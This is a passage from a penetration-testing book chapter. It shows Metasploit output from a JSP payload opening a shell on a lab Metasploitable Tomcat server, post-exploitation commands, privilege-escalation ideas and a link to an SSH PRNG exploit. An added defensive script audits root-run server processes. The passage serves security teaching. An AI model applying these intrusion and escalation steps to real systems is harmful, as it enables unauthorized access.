Chapter 17
[*] Executing /FW36owipzcnHeUyIUaX/UGMIdfFjVENQOp4VveswTlma.jsp...
[*] Undeploying FW36owipzcnHeUyIUaX ...
[*] Command shell session 1 opened (172.16.32.129:43474 -> 172.16.32.162:9999) at 2010-05-21 23:57:47 -0400
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
whoami
tomcat55
ls /root
reset_logs.sh
mkdir /root/moo.txt
mkdir: cannot create directory '/root/moo.txt': Permission denied
Notice that we cannot write to the root folder, because we’re running from a limited user account and this folder requires root-level permissions. Usually, Apache runs under the Apache user account, which is sometimes apache but can also be httpd or www-data, among other names. Based on what we know about the operating system version in use on the target, we could use local privilege escalation techniques to gain further access as root. Because we already have some basic access, let’s try a couple of different attacks.
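The denied write above is the service account's limited rights at work: a shell obtained through the server inherits only what that account can do. As an added example that is not from the book, the following defender-side check reads `ps -eo user,pid,ppid,comm` output and flags web or application server processes that run as root. The sample process table and the list of server process names are constructed assumptions.

```shell
#!/bin/sh
# Added example (not from the book). Flags web/app server processes that run
# as root. A root-owned parent whose children run under an unprivileged
# account (the usual Apache layout) is reported as OK-PARENT.

# Constructed sample of `ps -eo user,pid,ppid,comm` output.
sample_ps() {
cat <<'EOF'
USER       PID  PPID COMMAND
root         1     0 init
root       812     1 apache2
www-data   845   812 apache2
www-data   846   812 apache2
tomcat55   903     1 jsvc
root      1204     1 java
root      1310     1 sshd
EOF
}

# Assumed list of server process names to audit; adjust per host.
SERVERS='apache2 httpd nginx jsvc java'

# Reads ps output on stdin, prints one "STATUS user pid comm" line per match.
audit_service_users() {
  awk -v servers="$SERVERS" '
    BEGIN { n = split(servers, s, " "); for (i = 1; i <= n; i++) want[s[i]] = 1 }
    NR == 1 { next }                      # skip the header row
    ($4 in want) {
      user[$2] = $1; comm[$2] = $4; order[++m] = $2
      if ($1 != "root") dropped[$3] = 1   # parent $3 has an unprivileged child
    }
    END {
      for (i = 1; i <= m; i++) {
        p = order[i]
        if (user[p] != "root")      st = "OK"
        else if (p in dropped)      st = "FLAG"
        else                        st = "FLAG"
        if (user[p] == "root" && (p in dropped)) st = "OK-PARENT"
        print st, user[p], p, comm[p]
      }
    }'
}

sample_ps | audit_service_users
```

On a live host, pipe the real `ps -eo user,pid,ppid,comm` output into `audit_service_users` instead of the sample.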
NOTE
Here’s a little hint on obtaining root access to Metasploitable without privilege escalation: Check out http://www.exploit-db.com/exploits/5720/ for the SSH predictable PRNG exploit.
Attacking Obscure Services
When we performed only the default nmap port scan, we did not include all possible ports. Because we have now gained initial access to the system, we enter netstat -antp, and we notice other ports that nmap did not scan for